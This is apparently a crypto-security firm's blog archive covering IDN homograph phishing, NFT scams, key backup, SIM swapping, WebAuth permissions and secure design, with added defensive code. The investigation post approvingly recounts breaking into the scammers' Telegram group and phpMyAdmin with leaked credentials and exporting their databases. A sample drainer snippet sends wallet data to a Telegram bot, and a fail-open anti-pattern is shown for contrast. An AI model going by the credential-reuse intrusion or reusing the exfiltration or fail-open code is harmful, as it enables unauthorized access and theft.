Categories
Alvosec

The quieter you become, the more you are able to hear – part 1

Intro

In the last few months, we have detected an increase in new strategies used by malicious attackers. Unfortunately, they were successful in draining a lot of crypto wallets, stealing more than $1 million worth of different cryptocurrencies. After we realized that multiple victims were unable to recognize the new attack methods as malicious, we began an investigation.

New phishing method

This phishing method takes advantage of the fact that characters from various languages and scripts are sometimes visually similar to each other. For example, the Cyrillic “а” and the Latin “a” look virtually identical. This technique is known as a homograph attack.

Here is a scam Twitter account that was used to distribute malicious content. Pay attention to the letter ŏ in the domain.

Another phishing account on Twitter.

Again, pay attention to the letter á in the domain. This is what is called an IDN domain.

Internationalized Domain Names (IDNs) enable people around the world to use domain names in local languages and scripts.

Here are a couple more examples of IDN phishing domains:
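The checks a defender would run on a suspicious link, as an added example that is not part of the original post: it flags non-ASCII characters in a domain (such as the ŏ and á above), flags labels that mix scripts (Latin plus Cyrillic), and shows the punycode form that browsers display in the address bar. The sample domains are constructed for the example and are not the phishing domains from the investigation.

```python
import unicodedata

# Constructed sample domains (not the real phishing domains from the post).
# The second one carries a Latin letter with a diacritic, like the examples above;
# the third mixes a Cyrillic "а" (U+0430) into an otherwise Latin label.
SAMPLE_DOMAINS = [
    "wallet-example.com",
    "wallet-exŏmple.com",
    "w\u0430llet-example.com",
]


def label_scripts(label):
    """Set of scripts used in one DNS label, taken from the Unicode character
    names (e.g. 'LATIN SMALL LETTER A' -> 'LATIN'). Digits and hyphens are
    script-neutral and are skipped."""
    scripts = set()
    for ch in label:
        if ch == "-" or ch.isdigit():
            continue
        scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts


def analyze_domain(domain):
    """Return the homograph checks for one domain: every non-ASCII character
    with its Unicode name, every label that mixes scripts, and the punycode
    ("xn--") form a browser shows for an IDN."""
    labels = domain.lower().split(".")
    odd_chars = [(ch, unicodedata.name(ch, "UNKNOWN")) for ch in domain if not ch.isascii()]
    mixed = [label for label in labels if len(label_scripts(label)) > 1]
    try:
        punycode = domain.encode("idna").decode("ascii")
    except UnicodeError:
        punycode = None  # not encodable under IDNA: treat as suspicious as well
    return {
        "domain": domain,
        "punycode": punycode,
        "non_ascii_chars": odd_chars,
        "mixed_script_labels": mixed,
        "suspicious": bool(odd_chars) or bool(mixed) or punycode is None,
    }


def report(domains=SAMPLE_DOMAINS):
    """Run the checks over a list of domains and return the results in order."""
    return [analyze_domain(d) for d in domains]


if __name__ == "__main__":
    for r in report():
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['domain']} -> {r['punycode']}")
        for ch, name in r["non_ascii_chars"]:
            print(f"           contains {ch!r} ({name})")
```

The punycode form is the practical tell: a look-alike domain that renders as familiar letters in a tweet becomes an obvious xn-- string once encoded, which is why comparing the encoded form against the domain you expect is a cheap check before connecting a wallet.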

What happens if a victim visits a website?

These malicious websites often look like legitimate websites and promote fake airdrops. To claim the airdrop, victims are prompted to connect either their MetaMask or their TrustWallet.

Once a wallet has been allowed to connect to a website controlled by a bad actor, the site tries to initiate a transfer of the victim's assets to the attacker's wallet address.

The attack targets the user's wallet, as you can see in the code below, where the attacker defined user_wallet for the purpose of 'draining'.

In the chain of these attacks we detected several addresses; the one from the picture can be checked on Etherscan.

Investigating scam websites

First, we investigated where it all started. These bad actors purchase domains that look like legitimate domains, and victims often do not spot the difference. If you ask yourself what the TLD (.com, .org, .net, etc.) is for the top five websites you visit every day, you may well get some wrong. That is why it is easy to deceive a user by changing a detail that people rarely focus on.

Most of these websites were using Cloudflare as a reverse proxy to hide the actual server hosting the website. Since that was not important for us, we searched for more valuable information that would lead us closer to the attackers. We checked the JavaScript files and found that some of them were obfuscated. De-obfuscation was fairly complex and took plenty of time, but we 'knew' we would find important data that the attackers had intentionally tried to hide.

First, we found that they used multiple wallets to receive the stolen funds. Second, we found Telegram bot credentials that were used to notify the attacker via Telegram.
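A small indicator extractor of the kind used to triage a de-obfuscated drainer script, as an added example that is not code from the original post or from the scam site: it scans script text you have already downloaded for the Telegram bot token format (numeric bot id, colon, 35-character secret), Telegram API URLs and chat ids, and EVM wallet addresses, and masks the token before reporting. The sample script, the token and the address are constructed placeholders, not values from the investigation.

```python
import re

# Constructed sample resembling a de-obfuscated drainer script (placeholder
# token and address; not real values from the investigation).
SAMPLE_JS = """
var _0x1f=["https://api.telegram.org/bot","123456789:AAHpl4c3h0ld3rT0k3nF0rTh1sEx4mpl3_0","/sendMessage?chat_id=-100123456789&text="];
var user_wallet="0xab12ab12ab12ab12ab12ab12ab12ab12ab12ab12";
fetch(_0x1f[0]+_0x1f[1]+_0x1f[2]+encodeURIComponent("connected: "+addr));
"""

# Patterns for the indicators worth pulling out of such a script.
INDICATOR_PATTERNS = {
    # Telegram bot tokens look like <numeric bot id>:<35 chars of [A-Za-z0-9_-]>
    "telegram_bot_token": re.compile(r"\b\d{8,12}:[A-Za-z0-9_-]{35}\b"),
    "telegram_api_url": re.compile(r"https://api\.telegram\.org/bot"),
    # chat ids of groups/channels are negative numbers
    "telegram_chat_id": re.compile(r"chat_id[\"'=:\s]*(-?\d{6,})"),
    # EVM (Ethereum-style) addresses: 0x followed by 40 hex digits
    "evm_address": re.compile(r"\b0x[a-fA-F0-9]{40}\b"),
}


def extract_indicators(script_text):
    """Return {indicator name: sorted unique matches} for every pattern that hits."""
    found = {}
    for name, pattern in INDICATOR_PATTERNS.items():
        matches = sorted(set(pattern.findall(script_text)))
        if matches:
            found[name] = matches
    return found


def mask_token(token):
    """Keep the bot id and the first 4 secret characters; hide the rest so the
    token can appear in a report without being reusable."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def summarize(script_text):
    """Indicators with the bot token masked, ready for an investigation note."""
    found = extract_indicators(script_text)
    if "telegram_bot_token" in found:
        found["telegram_bot_token"] = [mask_token(t) for t in found["telegram_bot_token"]]
    return found


if __name__ == "__main__":
    for name, values in summarize(SAMPLE_JS).items():
        print(f"{name}: {', '.join(values)}")
```

Run it over each de-obfuscated file and diff the results across the sites in the campaign: shared bot ids, chat ids and receiving addresses are what tie separate phishing domains to one operator.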

Here is some basic information about the bot.

The Telegram bot leaked a list of users who were interacting with it.

Since the bot had privacy mode enabled and can_read_all_group_messages was disabled, we could not get all messages created by the bot. We tried multiple methods (creating an invite link, forwarding messages to our chat, etc.), but without success.

approveChatJoinRequest?chat_id=

At some point, we tried to forward messages from their group to their group again.

forwardMessage?chat_id=-<id>&from_chat_id=-<id>

Bam, it worked! We were able to read all responses for every message_id. We were also aware that time was ticking before the scammers realized what was going on. We needed to extract all messages quickly, so we used Burp Suite Intruder to set up a payload for brute-forcing every message_id=.

As soon as they realized that we were forwarding all messages, they deleted the chat.

Whenever someone connected a wallet, the scammers were immediately notified. They also recorded visitors' IP addresses, successful transactions, etc.

As soon as you build something, you are tempted to test it first, and that is exactly what they did. They connected their own wallet to their scam website and even drained a couple of USDT.

They were also the first to visit their website, leaving all the traces (IP addresses). Everyone involved in a criminal act leaves traces; there is no such thing as a "perfect crime". They made another crucial mistake: they connected their old wallet, which appeared in the chain of transactions and allowed us to track it to a wallet that was funded from Binance.

Soon after we had gathered various types of information, we noticed an unusual .php file loaded by the page. A quick check and, bam again, new information, this time MySQL credentials.

Without hesitation: fuzzing returned a 200 for phpmyadmin, meaning it was enabled. We used their credentials, logged in and exported all databases for further analysis.

The first part of the investigation ends here; we need more time to process all the data we gathered in order to create a clear picture of how these scammers operated.

If you are familiar with the techniques used in this research and are interested in participating in our investigations, feel free to contact us.

To be continued…

The most common NFT scams

With the NFT euphoria, it’s no surprise that scammers are on the hunt for a paycheck. The good news is that knowing the most frequent NFT scams can help you stay a step ahead of fraudsters. Follow along as we explore the most common schemes you need to know about.

Here is a list of the most common NFT scams and what you can do to avoid them.

1. Phishing scams

One of the most common NFT schemes is phishing scams, which involve the use of fake websites that ask for 12-word security seed phrases and private wallet keys. There are also malicious pop-ups shared on Discord, Telegram, Twitter, forums and via email. In most cases, the resemblance with legitimate websites is almost perfect. Thus, it will take a keen eye to spot even the smallest differences in the URL or the website layout.

To avoid phishing scams, it is best to check the URL first before clicking. Remember not to give your seed phrases and private wallet keys to anyone outside of your NFT wallets. 

2. Rug pull scams

Rug pull scams, which get their name from the expression "pulling the rug out", involve fraudulent developers promoting fake NFTs on social media with the goal of convincing more people that the project is real and that they will make money out of it.

The scammers will hype up a project, attracting more people to invest and then without notice, discontinue the project. This occurs once they have fully drained the investors, withdrawing all funds in an NFT wallet. After which, the scammers delete all their profiles on marketplaces and social media platforms. 

You can avoid these NFT scams by doing your research. Look for the NFT collection and see if it has legitimate artists and developers behind it. One way to check their legitimacy is by visiting their website or social media accounts.

Active social engagements and several discussions about their crypto projects are good indications that the project is actually genuine.

3. Pump-and-dump crypto schemes

Compared to rug pull scams, which involve convincing people to invest in fake crypto or NFT projects, pump-and-dump scams involve scammers buying a large number of cryptocurrencies or NFTs to create an artificial sense that an asset is in high demand. With people thinking that the project is highly profitable, they start placing their money on it as well. Once the price hits a targeted level, the scammers sell the NFTs or cryptos, leaving the investors with worthless assets.

To avoid falling victim to pump-and-dump crypto schemes, make sure to check the number of transactions as well as the buyers of the project you are interested in. A considerable number of transactions can indicate the date when the scammer pumped the crypto or NFT.

4. Bidding scams

Another popular tactic is the bidding scam. It involves a scammer changing the currency of their offer to one of lower value, say from ETH to USD, which causes your earnings to drop to a lower price.

To avoid bidding scams, double-check the currency used. If a potential buyer negotiates for a lower bid, consider that a red flag. 

5. Plagiarised NFTs

Scammers may copy or steal artwork and list this plagiarised NFT on legitimate sites such as OpenSea, Soon.Market etc. Since it was copied or stolen, the NFT has no value. Sadly, the victim has already spent funds to purchase the NFT before even realizing it is fake. 

Example of cloned NFT on soon.market

Before buying an NFT, check the seller name and all the information that should match the real owner. Also make sure to check when the auction ends: as you can see, the fake auction had only a little time left, while the real one ends in 3 days 22 hours…

You can also check the authenticity of an NFT by dragging the image of the digital artwork to Google Images. If you find other artists who own the piece, it is more likely that the one you’re about to purchase is fake. 

6. Real example: Copy scam of “Proton DEX Key” NFTs

Unfortunately, yesterday we witnessed a real example of a scam in the Proton NFT ecosystem, where a scammer stole around 700k $XPR. We asked product leader Marco from Soon.Market to comment on the incident.

“When I woke up Friday morning around 7 AM CET I discovered various messages and recognized that 2 different copies of the original collection had been created by a scammer. The scammer launched various auctions with two different accounts. Unfortunately, I woke up too late and some users had already placed their bids in two of these auctions. We reacted quickly and put these collections into our blacklist. From that point in time these auctions were not displayed on Soon.Market any longer. As the auction is running decentralized and controlled by the logic written in the AtomicMarket contract, there is no possibility to cancel it, meaning that two people in the community lost their money on this auction.”

“It was a very sad moment for us and the NFT community. But I am sure we will get out of this stronger than ever! Though it’s a high advantage of Proton that new accounts can mint their first NFTs for free, it comes with a huge downside as we can see. Different marketplaces provide easy minting solutions and some of them currently allow minting without any further background check. This, unfortunately, is a heaven for scammers and the worst part is: they do not even have to have any technical knowledge!”

Marco told us about their future plans, how they intend to fight against NFT scams:

“We had plans to introduce a community governed blacklisting & whitelisting already for a long time and applied for a developer grant to implement an application that can be used by Proton NFT Watch to take decisions. In September 2022 this grant has finally been approved and after this wake up signal we will prioritize this topic and prepare our market in that regard – NOW!

I am happy to announce that we will soon introduce hints for the users to educate them before buying an actual NFT which is not on the whitelist. In the beginning, the whitelist will contain only the Proton DEX Keys as well as our own collections (“Soon.Market” & “Power of Soon”) and we encourage everybody in the community to join our Discord where we created the #proton-nft-watch channel. Everybody can propose to whitelist a specific collection there and together we will vote and decide if a collection will be whitelisted or not. All collections that are whitelisted will be marked as such on our market and the hint “Watch out for scam” won’t be displayed for these collections. Soony, our notification bot on Telegram, will get the same logic and make it clear if a collection is whitelisted or not.

In the future, we aim to further decentralize this approach and the application that supports Proton NFT Watch will kickstart this initiative. I invite everybody in the community to join our Discord. The first draft of the Proton NFT Watch rules on how to handle blacklisting and whitelisting will be shared as soon as possible and everybody is invited to provide their opinion. Let’s educate and help each other to give scammers no chance – we all know: scammers always gonna scam!

In the upcoming weeks we will organize a Twitter Space to discuss our recent updates and future plans, specifically in regards to whitelisting & blacklisting with the help of Proton NFT Watch – stay tuned and watch out for scam!”

Telegram:
Proton NFT Watch: https://t.me/pmnftwatch
Soon.Market: https://t.me/soon_market

Discord:
Soon.Market: https://discord.gg/KtVVaYy6b3

Stay safe!

Important! 5 ways to backup WebAuth private key

In this guide we will introduce you to private keys, their importance inside a cryptocurrency wallet and the reasons why you must back them up securely. We will also be making a recommendation on where to safely store your private keys.

Important: If you lose your private key, you will be unable to recover it, and you will lose your funds forever. Please do not confuse private keys that you own with passwords that you can recover!

First and foremost, the golden rule of crypto is to NEVER share your private key with anyone. There are many common scams which trick users into revealing or sharing their private key. These schemes can be very elaborate, so it is recommended to abide by this golden rule in all situations. Follow our blog regularly, because we often publish various articles about different scams.

How do I get my WebAuth private key?

Step 1

Open your wallet and tap on the settings icon which is on the far right.

Step 2

Tap on ‘Backup Wallet’.

Step 3

Type “I will never give my private key to anyone else” to proceed.

Step 4

Tap on the ‘Copy to pasteboard’ button to copy your private key.

Now that you have your private key, it is time to back it up securely.

Where should I store my private key?

How and where to store your private keys is absolutely critical to the security of your crypto assets. Read on to find out how to make sure your crypto funds are safe.

1. Encrypt and store your private key on Cloud

Paste your private key into a text editor and save it. Choose any of the following methods to encrypt it (all of them meet the standard for secure file storage!). Whichever method you pick, delete the plain-text file once the encrypted copy exists.

  • Use OpenSSL. The following command asks for a passphrase and writes the encrypted file next to the original:

openssl aes-256-cbc -salt -pbkdf2 -in private_key.txt -out private_key.txt.enc

  • Use Cryptomator. With Cryptomator, you can encrypt your cloud storage (folder) by creating a vault in your cloud service and uploading your files into it. (Don’t forget to store your Cryptomator password!)

Here is an example of encrypted private keys that we stored on cloud:

Encrypted files on cloud

  • Use 7-Zip or ZIP to compress and encrypt the file. Select your file and choose compress with encryption.

Encrypted ZIP file

2. Encrypt and store your private key on removable drive (USB or SD card)

Buy a USB drive and use it only for backup purposes. If you reuse an old drive, make sure it is clean (format it before you use it). Every method from the previous point can also be applied to a USB drive or SD card.

Besides that, the removable drive can be encrypted as a whole (VeraCrypt or BitLocker To Go).

3. Put your private key on paper

Paper wallets are one of the oldest kinds of private key storage, and they still work as long as you generate, print/write and store the keys securely. (A paper wallet must be combined with at least one more electronic backup.)

Paper is a perishable material. Think for example of the influence that moisture, sun, or simply time have on paper. It discolors and letters may no longer be legible over time.

Here you can use our JavaScript QR code generator to store your private key as a QR code. We advise you to download the script locally and run it offline.

https://github.com/alvosec/qr-code

Keep in mind that some printers store printed data in their internal memory!

4. Consider different backup locations

One of the basic backup rules is to store data in multiple locations that are isolated from each other; that is why we suggest keeping at least two copies in different storage locations.

5. Bad practice

Here are some common mistakes that many crypto users fall into.

  • Do not hesitate to back up private keys (do it now!)
  • Do not store private keys in plain text
  • Do not take screenshots of your mnemonics or private key (mobile devices sync photos to the cloud in clear text)
  • Ensure backup media devices are protected (use antivirus software to scan the device regularly)
  • Do not share your private key with anyone (learn about crypto scams)

Important: If you are attempting to back up your private key but are accessing from a country where WebAuth is not permitted, you must connect to a VPN to access your private key.

To explore the available features for your account, visit the following page: https://xprotect.org/user-reputation/

Stay safe!

What is SIM swapping?

SIM swap fraud occurs when scammers take advantage of a weakness in two-factor authentication and verification and use your phone number to access your account.

SIM swapping happens when scammers contact your mobile provider and trick them into activating a SIM card that the fraudsters have. Once this occurs, the scammers have control over your phone number. Anyone calling or texting this number will contact the scammers’ device, not your smartphone.

This is known as SIM swap fraud, and it means scammers could potentially enter your username and password when logging onto your bank’s website. The bank or any other service will then send a code by text — two-factor authentication — to your smartphone number, a code that you’ll then have to enter to access your online account. The problem? After a SIM swap, that number now goes to the smartphone or other device possessed by scammers. They can then use that code to enter your bank account.

Fortunately, you can protect yourself against SIM swapping. It’s all about preventing scammers from finding out what logins and passwords you use to access your online bank or credit card accounts. And it helps, too, to look out for the most common warning signs of a SIM swap scam.

How can you protect yourself against a SIM swap?

The most important sign to watch for is losing your mobile signal. Once a duplicate SIM is activated, the victim's SIM card loses network access completely and can no longer be used to call or send a text message. If this happens, contact your mobile provider and ask them to deactivate your SIM.

Insider threats aside, the most effective things you can do to prevent fraudulent SIM swaps from happening on your account are:

Step 1

Limit the amount of personal data you post online. Educate yourself to avoid all types of scam!

Step 2

If you are using SMS/text authentication to gain access to any online accounts, change this to email or Google Authenticator. If the platform does not allow this, seriously consider shifting to another one that does.

Step 3

Never reply to any emails asking for information such as your email address, SSN, or any other personally identifiable information.

Step 4

If you receive a call asking for personal information or any other sensitive information, do not provide it. The fraudster might be pretending to be calling from your bank, crypto exchange or any other service.

Step 5

Some mobile operators require a PIN to be able to perform a SIM swap. Use a hard-to-guess number or phrase as your PIN. Avoid using birthdays or phrases such as your first name or names of pets. And never post this PIN anywhere online.

How to authorize another user to your WebAuth wallet?

Wallet security and keeping private keys safe is the most important part of any crypto application's or platform's infrastructure. If the private key of your crypto wallet is stolen, you will lose your funds. And if you lose the private key, the digital coins under that wallet are lost forever. What if the owner of crypto funds dies: how will anyone inherit the assets if they do not have access to that wallet? That is why we would like to guide you through this tutorial, where we show how to authorize another user, such as a family member or someone you trust completely.

Trenton Kennedy is a communications manager at blockchain analytics company Chainalysis. He pointed to this 2020 blog post when asked to share data on the amount of Bitcoin that may have been lost forever for various reasons, including death.

According to the blog, 20% of all Bitcoin in circulation has been lost, maybe forever. That is the equivalent of 3.7 million BTC, valued at $75 billion at the current price.

Matthew Mellon passed away in 2018. His death was unexpected and, while he was assumed to be worth around $200 million, most of that money was in cryptocurrency. He hadn’t shared his access keys to that currency with anyone, so no one could get to it.

As mentioned, this guide teaches you how to authorize another user so that they become a co-owner of your account. This also mitigates the risk of losing the private key, as well as of it being compromised.

1. Add your device to WebAuth for Web (Video + Text instructions)

Watch the video tutorial if that is easier for you to follow.

In this case, we are going to use WebAuth for Web.

Step 1

Log in to an existing account using your mobile device.

Step 2

Once you’re logged into an existing account, you will need to set up a device key to authenticate transactions and actions.

Step 3

Click Add new device and choose authentication method:

  • Native Platform Authenticator: Touch ID for Mac or Windows Hello for Windows. No Linux-based option.
  • USB Authenticator: Yubikey or Google Titan that works with all operating systems.
  • Ethereum Wallet: You can link any Ethereum wallet to be the authenticator on all operating systems.

In our case, we will select Touch ID and approve it.

You will be prompted:

“Do you want to save a passkey for “debian”? Passkeys are saved in your iCloud Keychain and are available for sign-in on all your devices.”

You can also save on another device if you want.

Important: Deleting browser data will delete your Touch ID key, so it is critical to back up your seed phrase and/or private key.

Step 4

Enter Device Name (Public) and click Add device.

Step 5

Sign in and you are ready to go.

2. Authorize another user by using WebAuth for Web (Video + Text instructions)

Step 1

Open WebAuth.com, where you already added your account.

Step 2

Open another Tab and navigate to protonscan.io.

Step 3

Login by choosing WebAuth for Browser and Authorize.

Step 4

Click on Wallet down below, then Menu and select Keys and Permissions.

Step 5

Click on Advanced and select Active permission (you can also change Owner permission).

By default Proton wallet has 2 native permissions (Owner and Active):

  • Owner: The Owner permission is the “root access” to your Proton wallet and symbolises ownership of the account. This key is needed to make any changes to the ownership of the account.
  • Active: used for transferring funds, voting for producers, buying RAM, etc.

Step 6

Add the account name and permission (active). Scroll up and hit the button to save it.

Step 7

Sign the action and check that the permission has been updated.

We can see that @alvosec account is now authorized with active permission.

If we click on the TX, we will see under Actions the signer public key, which we created earlier by adding a new device in WebAuth.com.
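What the Keys and Permissions screen submits on your behalf, as an added example that is not code from WebAuth, protonscan or the original post: it assumes the chain follows the EOSIO updateauth model that Proton is built on (an authority with a threshold, weighted keys and weighted account permissions, keys and accounts kept sorted, active's parent being owner). The device key, the account name "youraccount" and the helper names are placeholders; @alvosec is the account authorized in the post. It also shows the point the walkthrough does not spell out: with threshold 1, either the device key or the added account can sign alone (a co-owner), while threshold 2 would require both (a 2-of-2 multisig).

```python
import json
import re

# EOSIO-style account name rules (assumed to apply to Proton accounts as well).
ACCOUNT_NAME = re.compile(r"^[a-z1-5.]{1,12}$")

# Placeholder for the public key WebAuth created when the device was added.
DEVICE_KEY = "PUB_K1_PLACEHOLDER_DEVICE_KEY"


def permission_level(actor, permission="active", weight=1):
    """One account entry of an authority: actor@permission adds `weight` to the total."""
    if not ACCOUNT_NAME.match(actor):
        raise ValueError(f"invalid account name: {actor!r}")
    return {"permission": {"actor": actor, "permission": permission}, "weight": weight}


def build_authority(threshold=1, keys=(), accounts=(), waits=()):
    """Assemble the `authority` object for updateauth. Keys are sorted by key
    string and accounts by (actor, permission), as the chain requires, and an
    authority whose weights can never reach the threshold is rejected early."""
    keys = sorted(({"key": k, "weight": w} for k, w in keys), key=lambda e: e["key"])
    accounts = sorted(accounts, key=lambda a: (a["permission"]["actor"], a["permission"]["permission"]))
    waits = list(waits)
    total = sum(e["weight"] for e in keys) + sum(a["weight"] for a in accounts) + sum(w["weight"] for w in waits)
    if threshold < 1 or total < threshold:
        raise ValueError(f"threshold {threshold} is unreachable with total weight {total}")
    return {"threshold": threshold, "keys": keys, "accounts": accounts, "waits": waits}


def updateauth_action(account, permission, authority):
    """The eosio::updateauth action for the owner or active permission. Owner has
    no parent; active's parent is owner. The action is signed with the permission
    being changed."""
    parent = "" if permission == "owner" else "owner"
    return {
        "account": "eosio",
        "name": "updateauth",
        "authorization": [{"actor": account, "permission": permission}],
        "data": {"account": account, "permission": permission, "parent": parent, "auth": authority},
    }


def satisfied_by(authority, signer_keys=(), signer_accounts=()):
    """Would these signers reach the threshold? signer_accounts is a list of
    (actor, permission) pairs; each matching entry counts its weight once."""
    keys = set(signer_keys)
    accounts = set(signer_accounts)
    weight = sum(e["weight"] for e in authority["keys"] if e["key"] in keys)
    weight += sum(a["weight"] for a in authority["accounts"]
                  if (a["permission"]["actor"], a["permission"]["permission"]) in accounts)
    return weight >= authority["threshold"]


def shared_active(account, trusted, device_key=DEVICE_KEY, threshold=1):
    """Active permission held by the device key plus trusted@active (the post's Step 6)."""
    auth = build_authority(threshold, keys=[(device_key, 1)], accounts=[permission_level(trusted, "active", 1)])
    return updateauth_action(account, "active", auth)


if __name__ == "__main__":
    print(json.dumps(shared_active("youraccount", "alvosec"), indent=2))
```

Before signing, read the threshold back: the screen in Step 5 lets you change it, and a value of 1 is what makes the added account a true co-owner who can act (or inherit) without your device key.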

If you have any questions, feel free to ask us.

Stay safe!

7 Security Principles you need to know

The explosion of high-quality application development frameworks has been a boon to the world’s software. It’s easier than ever to put together an application and start delivering value for customers, who can come from anywhere in the world. Unfortunately, the same is true for hackers coming to attack your application. As the world’s software grows more connected, and contains more valuable data, hackers have grown more sophisticated. They’re no longer kids in someone’s basement. Today’s hackers command massive botnets and receive sponsorship from hostile nation-states. Networked application security needs to be able to stand up to hundreds of hours of CPU time and committed adversaries.

Here’s the bad news: it’s impossible to write perfectly secure applications. Bugs are going to slip through, and if they do, attackers will find them. But that’s the bad news. The good news is that you can design your applications to minimize the damage those bugs cause. The even better news is that designing secure applications isn’t complicated or mysterious. The key is to follow a few key principles during the application design phase. This way, even when bugs rear their ugly heads, the damage they cause doesn’t lead to attackers obtaining all your valuable data, or the entire service going down.

In this post, we’ll talk about key security principles that will work in any kind of application. Following these principles is critical to ensuring that the software you ship is safe and secure for your customers.

1. Principle of Least Privilege

The first principle for secure design is the Principle of Least Privilege. The Principle of Least Privilege means ensuring that people have only the access they need to do their job. For instance: if you design a system which holds sensitive customer financial information, it's good practice to limit who can access that information. The person who answers the phone and schedules meetings probably doesn't need access to all of the sensitive information. On the other hand, an account manager probably does need access to that information. The key is to ensure that the account manager doesn't have access to information from accounts they don't manage.

By ensuring that accounts have only the privileges necessary to do their job, you ensure that if an attacker compromises an account, you minimize what information they can access. This limits the damage of the attack.

2. Principle of Separation of Duties

The Principle of Separation of Duties follows on from the Principle of Least Privilege. The idea behind Separation of Duties is that no single role should have too much authority. This is different from the concept of Least Privilege. While that focuses on making sure that people only have the privileges they need to do their job, this is about making sure their job isn’t too big. When someone does a job that’s too big, we fall right back to the point where they’ll need lots of permissions to do that job. Also, when someone has many duties in their job, it means that they’re susceptible to making poor decisions.

In our hypothetical financial system from before, we wouldn’t want the person who’s responsible for making sales also able to approve discounts. That person would have an incentive to discount the software, and might make poor decisions about discounts in order to boost their sales numbers. Instead, someone else, like a manager, should need to approve a discount before the sale finishes.

3. Principle of Defense in Depth

The Defense in Depth Principle is a bit different from preceding principles. While Least Privilege and Separation of Duties think about how people gain access to the system, Defense in Depth is about preventing access to the system. The basic expectation with Defense in Depth is that any security system you put in place is going to fail. It might be very difficult to circumvent computer security systems, but it’s always possible.

Designing with Defense in Depth means setting up systems which will tell you when your designated security fails. For instance, many servers for software systems use security software, but are co-located in a single building. Someone who broke into that building would have physical access to each of the servers. Suddenly, that fancy firewall or intrusion detection software is worthless. This is why data centers are designed with physical security present and security cameras to detect intruders. The world's best firewall won't help even a little if you forget to put a $5 lock on the outside door to your data center.

4. Principle of Failing Securely

Much like with Defense in Depth, the Principle of Failing Securely recognizes that things are going to fail. To imagine how a system can Fail Securely, imagine a digital locking mechanism. Perhaps you need a security badge to access sensitive areas of a building. Following the principle of Least Privilege, your security badge only grants access to areas you need to do your job. What happens if the power goes out?

In a system that “fails open” all the locks stop working. Suddenly, you have access to every door in the building! If you’re the malicious sort, now’s the time to go snooping. In a system that instead Fails Securely, all of the doors lock. Instead of granting access to all of the doors in the building, you don’t have access to any of them. No snooping for you, today!

The same concept applies to software design. A system that’s designed to Fail Securely only grants access to parts of the system when every step of the process completes successfully.
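The first four principles applied to the hypothetical financial system from the text, as an added example that is not code from the original article: an explicit allow-list of (role, action) pairs gives least privilege, the account manager is scoped to the accounts they manage, the person who made a sale cannot approve its discount (separation of duties), and the check denies by default and on any error, so a missing record or an exception never turns into access. A deliberately fail-open variant is included for contrast. All users, accounts and roles are constructed sample data.

```python
from dataclasses import dataclass
from typing import NamedTuple


class Decision(NamedTuple):
    allowed: bool
    reason: str


@dataclass(frozen=True)
class User:
    name: str
    role: str
    managed_accounts: frozenset = frozenset()


# Constructed sample data for the hypothetical financial system in the text.
ACCOUNTS = {
    "acct-100": {"sales_rep": "sam", "financials": "confidential"},
    "acct-200": {"sales_rep": "dan", "financials": "confidential"},
}
USERS = {
    "rae": User("rae", "receptionist"),
    "mia": User("mia", "account_manager", frozenset({"acct-100"})),
    "sam": User("sam", "sales"),
    "dan": User("dan", "manager"),
}

# Least privilege: an explicit allow-list of (role, action). Anything absent is denied.
POLICY = {
    ("receptionist", "schedule_meeting"),
    ("account_manager", "read_financials"),
    ("sales", "create_sale"),
    ("manager", "approve_discount"),
}


def authorize(user, action, account_id, accounts=ACCOUNTS):
    """Fail securely: access is granted only when every step completes; any
    exception (unknown account, malformed record, ...) ends in a denial."""
    try:
        if (user.role, action) not in POLICY:
            return Decision(False, f"role {user.role!r} may not {action!r}")
        record = accounts[account_id]  # unknown account -> KeyError -> denied below
        # Least privilege: an account manager sees only the accounts they manage.
        if action == "read_financials" and account_id not in user.managed_accounts:
            return Decision(False, f"{user.name} does not manage {account_id}")
        # Separation of duties: whoever made the sale cannot approve its discount.
        if action == "approve_discount" and record["sales_rep"] == user.name:
            return Decision(False, "separation of duties: the seller may not approve their own discount")
        return Decision(True, "every check completed successfully")
    except Exception as exc:
        return Decision(False, f"check failed ({type(exc).__name__}); failing securely")


def authorize_fail_open(user, action, account_id, accounts=ACCOUNTS):
    """Anti-pattern for contrast: a missing record is read as 'nothing restricts
    this', so an unknown account id is the key to every door."""
    try:
        owner = accounts[account_id]["sales_rep"]
    except KeyError:
        return True  # fails open
    return user.role == "manager" or user.name == owner


if __name__ == "__main__":
    for name, action, acct in [("mia", "read_financials", "acct-100"),
                               ("mia", "read_financials", "acct-200"),
                               ("dan", "approve_discount", "acct-200"),
                               ("rae", "read_financials", "acct-999")]:
        d = authorize(USERS[name], action, acct)
        print(f"{name:4} {action:16} {acct}: {'ALLOW' if d.allowed else 'DENY '} ({d.reason})")
```

The shape to keep is the single success path at the bottom of `authorize`: every early return and the exception handler say no, so adding a new check can only remove access, never accidentally grant it.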

5. Principle of Open Design

The Principle of Open Design says that your system security shouldn’t rely on the secrecy of your implementation. This is a particularly important principle for security concepts like cryptographic implementations. Well-designed cryptography implementations are published publicly. They’re interrogated by the smartest people in the world before they’re put into practice.

The same should be true for any software system. For instance, a system which doesn’t Fail Securely, like before, might rely on the idea that “nobody would ever figure that out.” While it’s unlikely that an attacker might deduce that a bug grants access to the system, it’s not impossible. What’s more, if they ever gained access to your source code, they’d figure it out quickly. Instead, follow the principles for secure design to ensure the system is safe, no matter whether someone malicious gains access to your code.

6. Principle of Avoiding Security by Obscurity

Security by Obscurity is similar to the principle of Open Design. Imagine software which has a hard-coded secret username and password combination. When authenticated, this account has full access to every account in the system. The security of this system relies on the credentials of this account remaining a secret. Over time, a growing number of users will gain access to this account. Some will leave the company, but they won’t forget the password. At that point, the security of your application relies on the good will of those employees.

It’s true that every application’s security relies on secrets. Passwords are a critical part of most authentication schemes. There’s nothing that you can do about that. However, a better design for this system is one where the account with full access doesn’t exist in the first place. If you must include it, don’t hard-code the credentials. Instead, make the account a normal account. When someone with access to the account leaves the company, change the password.

7. Principle of Minimizing Attack Surface Area

The Principle of Minimizing Attack Surface Area is all about removing parts of an application to make it more secure. The classic example doesn’t come from software, but from thinking about our imaginary data center again. If you’ve ever visited a data center, you likely noticed they don’t have a lot of windows. Part of this is to benefit cooling the building. But part of the reason data centers aren’t encased in windows is windows are easy to break. You might have the absolute best locks in the business, but they don’t do any good if someone comes in through the window.

Parts of your application are like windows. They look nice, but they might expose functionality that leads to bugs. Minimizing Attack Surface Area questions whether a feature is necessary. Sometimes, by redesigning a feature to make it simpler, the application's overall security improves.

8. How to Dive Deeper

